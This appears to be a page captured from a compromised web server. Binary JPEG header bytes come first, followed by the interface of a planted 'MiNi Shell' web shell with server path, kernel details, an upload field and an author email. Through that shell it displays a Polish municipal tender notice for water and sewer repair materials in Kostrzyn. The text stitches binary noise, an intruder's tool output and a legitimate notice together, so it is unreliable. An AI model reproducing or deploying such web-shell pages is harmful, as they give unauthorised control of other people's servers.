JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220809/0029775501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie, w materiały służące do naprawy sieci i przyłączy wodociągowych i kanalizacyjnych w roku 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Komunalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 632023635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kostrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">616698910</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@zkkostrzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zkkostrzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zaopatrzenie mieszkańców w wodę i odprowadzenie ścieków </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie, w materiały służące do naprawy sieci i przyłączy wodociągowych i kanalizacyjnych w roku 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3127c461-14b1-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00297755</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040820/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie, w materiały służące do naprawy sieci i przyłączy wodociągowych i kanalizacyjnych w roku 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.zkkostrzyn.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https;//miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAP za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal. Zamawiający może również<br/>komunikować się z Wykonawcami za pomocą poczty elektronicznej na adres email: zamowienia@zkkostrzyn.pl,<br/>poczta@zkkostrzyn.pl<br/>2) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń (inne niż dołączane do oferty)<br/>składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza możliwość<br/>składania dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń (innych niż dołączane do oferty) za pomocą poczty elektronicznej.<br/>3) Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>4.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu, opisane zostały w Regulaminie korzystania z systemu mini portal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>6. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie mini portalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB. Przy komunikacji drogą mailową wielkość pliku wynosi<br/>maksymalnie 500 MB.8.Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przekazywanych w postępowaniu, przyjmuje się datę ich<br/>przekazania na ePUAP oraz odpowiednio datę przekazania emaila.<br/>9. W formularzu oferty Wykonawca zobowiązany jest podać adres Elektronicznej Skrzynki Podawczej na ePUAP oraz e-mail, na<br/>których prowadzona będzie korespondencja związana z postępowaniem.<br/>10. W sytuacji użycia poczty elektronicznej, wykonawca na żądanie Zamawiającego niezwłocznie potwierdza fakt otrzymania<br/>wiadomości. W przypadku niepotwierdzenia ze strony wykonawcy odbioru przesłanych informacji (pomimo takiego żądania),<br/>Zamawiający uzna, że wiadomość została mu doręczona w sposób umożliwiający wykonawcy zapoznanie się z nimi.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XIX SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XIX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.1.2.2.2022/PN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie, zwanego dalej Zakładem, w materiały służące do naprawy<br/>sieci i przyłączy wodociągowych i kanalizacyjnych w roku 2022, zgodnie z wykazem.<br/>Warunki techniczne :<br/>Zasuwy kołnierzowe miękko-uszczelnione – krótkie szereg F4<br/>˗ ochrona antykorozyjna: powłoka z farby epoksydowej o min. gr. 250 μm (wewnątrz i zewnątrz) – wymagany certyfikat GSK<br/>RAL gwarantujący jakość ochrony antykorozyjnej każdej dostarczonej sztuki armatury,<br/>˗ ciśnienie robocze: min PN10 max. PN16 korpus zasuwy z żeliwa sferoidalnego GJS-400-15,<br/>˗ przelot zasuwy: pełen, równy średnicy nominalnej i bez zwężeń,<br/>˗ trzpień (wrzeciono): ze stali nierdzewnej z gwintem walcowanym,<br/>˗ klin z żeliwa sferoidalnego min. GJS-400-15 wulkanizowany na całej powierzchni powłoką z gumy EPDM,<br/>- wymienne uszczelnienie trzpienia pod ciśnieniem,<br/>- wymienna nakrętka klina wykonana z mosiądzu prasowanego.<br/>Specyfikacja obudów do zasuw i nawiertek:<br/>-kaptur wykonany z żeliwa sferoidalnego min. EN-GJS-400-15,<br/>-pręt stalowy o przekroju kwadratowym,<br/>- rura osłonowa wykonana z PE,<br/>- możliwość ustawienia obudowy na dowolnej długości (teleskopowa),<br/>- zabezpieczenie antykorozyjne przez malowanie lub cynkowanie,<br/>- do oferty należy dołączyć: Kartę katalogową.<br/>Nawiertka samonawiercająca do rur PE i PVC:<br/>˗ korpus, pokrywa i klin wykonane z żeliwa sferoidalnego min. EN-GJS 400-15,<br/>˗ średnica nawiercania jednakowa dla wszystkich średnic nawiercanej rury: 38mm,<br/>˗ wydłużony nóż ze stali nierdzewnej,<br/>˗ obejma wyłożona gumą na całej powierzchni,<br/>˗ doszczelnienie noża do pierścienia mosiężnego znajdującego się z obejmie za pomocą gumowego o-ringu (nie dopuszcza<br/>się połączenia mosiądz-mosiądz),<br/>˗ możliwość wielokrotnego zamknięcia poprzez dokręcenie nawiertki bez konieczności stosowania dodatkowej zasuwki<br/>gwintowanej (funkcja zaworu zamykającego).<br/>Łączniki rurowo-kołnierzowe:<br/>˗ korpus, pierścień zaciskowy z żeliwa sferoidalnego,<br/>˗ uszczelka z mieszanki EPDM,<br/>˗ w przypadku łączników na rury PE/PVC wymagany pierścień mosiężny jako zabezpieczenie przed wysunięciem,<br/>˗ wymagane zakresy montażowe nie mniejsze niż podane w tabeli cenowej,<br/>- odchylenie osiowe z każdej strony +/- 3°,<br/>˗ wymagany certyfikat GSK RAL gwarantujący jakość powłoki antykorozyjne każdej dostarczonej sztuki.<br/>Nawiertki NWZ do rur PE i PVC:<br/>- korpus, pokrywa i klin wykonane z żeliwa sferoidalnego GJS 400-15,<br/>- obejma wykonana z żeliwa sferoidalnego GJS 400-15, połówki obejmy w całości wyłożone gumą EPDM,<br/>- prosty przelot zasuwy, bez przewężeń i bez gniazda w miejscu zamknięcia,<br/>- klin wulkanizowany na całej powierzchni tj. zewnątrz i wewnątrz gumą NBR, EPDM, dla średnicy DN32 dopuszcza się<br/>wykonanie klina z mosiądzu,<br/>- trzpień ze stali nierdzewnej z walcowanym gwintem i scalonym kołnierzem trzpienia,<br/>˗ ochrona antykorozyjna: farbą epoksydową o min. gr. 250 μm,<br/>˗ wymagany certyfikat GSK RAL gwarantujący jakość powłoki antykorozyjne każdej dostarczonej sztuki.<br/>Kształtki żeliwne kołnierzowe:<br/>- wykonanie z żeliwa sferoidalnego,<br/>- owiercenie kołnierzy: PN10,<br/>˗ ochrona antykorozyjna: farbą epoksydową o min. gr. 250 μm na zewnątrz odporna na promieniowanie UV, części<br/>zabezpieczone antykorozyjnie odporne na środki dezynfekujące<br/>- przyłącze kołnierzowe wg PN-EN 1092-2.<br/>Specyfikacja skrzynek do zasuw, nawiertek:<br/>korpus wykonany z tworzywa PEHD;<br/>- pokrywa wykonana z żeliwa szarego min. EN-GJL-250,<br/>- do oferty należy dołączyć: Kartę katalogową.<br/>Opaski naprawcze:<br/>- opaska - ze stali kwasoodpornej,<br/>- Śruby łączące wykonane ze stali nierdzewnej lub kwasoodpornej,<br/>- opaska- jednodzielna, z dociskiem,<br/>- uszczelnienie z gumy EPDM,<br/>- do oferty należy dołączyć: Kartę katalogową.<br/>Nasuwki ciśnieniowe, złączki dwukielichowe:<br/>-tworzywo PVC, PN 10, uszczelka EPDM,<br/>- powinny odpowiadać normie PN-EN ISO 1452-3:2010.<br/>Rura wodociągowa PVC:<br/>- tworzywo PVC PN 10, uszczelka EPDM.<br/>Rury PE<br/>- DN 32 x 3.0, PN 16 SDR 11<br/>- rury powinny odpowiadać normie PN-EN 12201-2 (do wody pitnej).<br/>- wszystkie zamawiane elementy muszą być fabrycznie nowe, oraz być trwale<br/>oznaczone nadrukiem. Nadruk powinien zawierać minimum:<br/>-Nazwę producenta ,<br/>-Rodzaj tworzywa,<br/>-Szereg wymiarowy,<br/>-Wymiary.<br/>Uszczelki płaskie gumowe z uszami<br/>- mieszanka gumowa EPDM.<br/>Złączka<br/>- żeliwo sferoidalne,<br/>- do rur PE zgodnie z EN 12201-2, PN 16, L=112 mm,<br/>- uszczelnienie i mocowanie wyłącznie na zewnętrznym obwodzie rury,<br/>- uszczelka typu O-ring z elastomeru o wysokiej elastyczności,<br/>- połączenie elastyczne, złączka obracalna także w stanie zmontowanym i w razie potrzeby, demontowalna,<br/>- gwinty wewnętrzne z żywicy POM wzmocnione pierścieniem ze stali nierdzewnej.<br/>Rury i kształtki powinny posiadać ściankę litą oraz klasę S (SN8). Rury i kształtki powinny odpowiadać normie PN-EN<br/>1401:2009.<br/>. Wymagane dokumenty – dostarczone do oferty:<br/>- Karta katalogowa producenta,<br/>- Atest PZH,<br/>- Deklaracja zgodności lub certyfikaty,<br/>- Certyfikat CNBOP,<br/>- Certyfikat GSK RAL. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44163100-1 - Rury</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44163160-9 - Przesyłowe przewody rurowe i akcesoria</p> <p class="mb-0">44160000-9 - Rurociągi, instalacje rurowe, rury, okładziny rurowe, rury i podobne elementy</p> <p class="mb-0">44130000-0 - Studzienki kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Każdy z wykonawców w poszczególnych kryteriach otrzyma odpowiednią liczbę punktów, wyliczoną<br/>w następujący sposób:<br/>Najniższa cena podana w ofertach nie podlegających odrzuceniu<br/>C= ---------------------------------------------------------------------------------------- x 100 pkt<br/>Cena oferty badanej nie podlegającej odrzuceniu.<br/>2. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów.<br/>3. Zamawiający, niezwłocznie zawiadomi Wykonawców, którzy złożyli oferty o:<br/>1) Wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania i adres, jeżeli jest<br/>miejscem wykonywania działalności Wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca<br/>zamieszkania i adresy, jeżeli są miejscami wykonywania działalności wykonawców, którzy złożyli oferty, a także punktacje przyznaną<br/>ofertom w każdym kryterium oceny ofert i łączną punktacje.<br/>2) Wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne.<br/>3) Unieważnienie postępowania – podając uzasadnienie faktyczne i prawne.<br/>4. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający zamieści informacje, o której mowa w ust. 5 pkt. 1, zamieszcza na<br/>tej stronie www: bip.zkkostrzyn.pl oraz https:miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek jeżeli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniej 100.000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-17 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">System miniportal pod adresem: http//miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com